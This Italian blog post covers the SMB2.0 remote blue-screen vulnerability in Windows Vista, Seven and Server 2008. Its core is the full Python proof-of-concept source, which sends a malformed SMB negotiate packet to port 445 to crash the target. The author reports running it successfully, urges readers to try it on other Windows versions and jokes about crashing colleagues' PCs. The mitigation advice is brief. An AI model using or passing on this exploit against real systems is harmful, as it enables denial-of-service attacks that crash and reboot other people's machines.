SMB2.0 Remote B.S.O.D.

Due giorni fà è stata resa pubblica una vulnerabilità del protocollo smb2, il baco affligge i sistemi windows vista, seven e windows server 2008. Questa falla permette ad un’attacante remoto di eseguire codice locale sulla macchina, nel migliori dei casi l’attacante remoto può provocare solo un “blue screen of death” con conseguente riavvio della macchina. Io ho provato di persona questo tipo di attacco e vi confermo che è tutto vero e che l’exploit funziona alla grande. Ho scaricato dal sito della microsoft l’ultima versione di vista con sp2, l’ho installata e poi ho provato l’hack e ha funzionato alla grande. Il mio client vista è andato in  blue screen  e poi si è riavviato. Di seguito trovate il codice sorgente che permette di sfruttare la falla del protocollo smb2…

Allora piccola premessa, avendo un account msdn tutto particolare posso scaricare le ultime versioni di tutti i software di microsoft,quindi ho preso ed ho scaricato l’ultima versione disponibile. Poi l’ho installata ed ho tirato giù il firewall, da una macchina linux nella stessa rete ho eseguito il seguente codice pyton:

#!/usr/bin/python
# When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep

host = “IP_ADDR”, 445
buff = (
“\x00\x00\x00\x90″ # Begin SMB header: Session message
“\xff\x53\x4d\x42″ # Server Component: SMB
“\x72\x00\x00\x00″ # Negociate Protocol
“\x00\x18\x53\xc8″ # Operation 0×18 & sub 0xc853
“\x00\x26″# Process ID High: –> normal value should be “\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe”
“\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54″
“\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31″
“\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00″
“\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57″
“\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61″
“\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c”
“\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c”
“\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e”
“\x30\x30\x32\x00″

)
s = socket()

s.connect(host)
s.send(buff)
s.close()

########### FINE CODICE ###############

Ovviamente al posto di IP_ADDR ho inserito l’ip della mia macchina con su vista e pam, appena dopo aver battuto l’invio su linux il pc vista è andato in blue screen of death e si è riavviato.. Come proteggersi da questa falla? tenete su il firewall.. disattivate  le condivisioni smb e aspettate l’uscita di una patch da parte di microsoft..
Devo ammetere che provare di persona un exploit e vedere l’effetto in diretta è divertente.. cmq se vi interessa ecco il link al sito dello scopritore della patch:

http://g-laurent.blogspot.com/

Qui trovate anche  la descrizione del bug del resete delle password per le versioni  inferiori alla 2.8.4 di wordpress…
Ora che sapete che il codice funziona su vista non divertivi a resettare i pc degli amici e dei colleghi ehehe…

ps:  io l’ho provato con vista e funziona, bisognerebbe testare  l’exploit anche su windows server 2008 e seven..

Vota l'articolo